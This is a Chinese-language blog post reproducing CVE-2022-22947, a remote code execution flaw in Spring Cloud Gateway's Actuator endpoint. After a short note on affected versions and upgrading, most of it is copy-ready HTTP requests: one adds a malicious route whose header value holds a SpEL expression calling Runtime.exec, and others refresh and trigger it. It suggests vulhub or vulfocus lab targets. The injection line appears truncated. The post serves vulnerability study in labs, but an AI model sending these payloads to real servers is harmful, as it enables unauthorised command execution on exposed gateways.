SpringCloudGateway远程代码执⾏漏洞复现(CVE-2022-
22947)
前⾔
Spring Cloud Gateway远程代码执⾏漏洞的安全公告。该漏洞为当Spring Cloud Gateway启⽤和暴露 Gateway Actuator 端点时,使⽤
Spring Cloud Gateway 的应⽤程序可受到代码注⼊攻击。攻击者可以发送特制的恶意请求,从⽽远程执⾏任意代码。
这⾥花不多说开始复现,感谢⼤家对MHcloud的⽀持,这篇⽂章本来早就该写的,但是因为⼀些事耽误了,现在补上!
1.漏洞有影响版本
Spring Cloud Gateway < 3.1.1
Spring Cloud Gateway < 3.0.7
Spring Cloud Gateway 其他已不再更新的版本
安全版本
cve漏洞库Spring Cloud Gateway >= 3.1.1
Spring Cloud Gateway >= 3.0.7
2.修复建议
官⽅已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级⾄安全版本
3.开始复现
1.添加包含恶意的路由(直接把我的包复制bp就⾏啦,把ip还有端⼝改成你⾃⼰的)
POST /actuator/gateway/routes/EchoSec HTTP/1.1
Host: 192.168.8.188:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 328
{
"id": "EchoSec",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream( }
}],
"uri": "example"
}
##显⽰这个状态就说明添加成功了
2.刷新⽹关路由
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.8.188:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
##这个界⾯表⽰刷新成功
3.触发我们添加的路由,命令执⾏
GET /actuator/gateway/routes/EchoSec HTTP/1.1
Host: 192.168.8.188:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
##命令执⾏成功
注意
我遇到的问题,有的可能跟作⼀样,但是结果不⼀样,⽐如点击bp重发器发送没反应,这时候你直接在数据包最后⾯加两个回车就好了!
对了环境的问题,vulhub上⾯有现成的环境,不过需要⾃⼰搭建,如果你们闲⿇烦的话,MHcloud这⾥给你们推荐⼀个线上的靶场vulfocus,这是⽩帽汇的产品。
地址:
##现在你们可以尽情的去玩了哈哈哈
在这⾥MHcloud⼜要和⼤家说再见了,我是⼀个⼩菜鸡,⼤佬勿喷!!
本⼈理念:菜也要菜的理直⽓壮!!
MHcloud⼀个对⽹络安全充满憧憬的⼩菜鸡
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论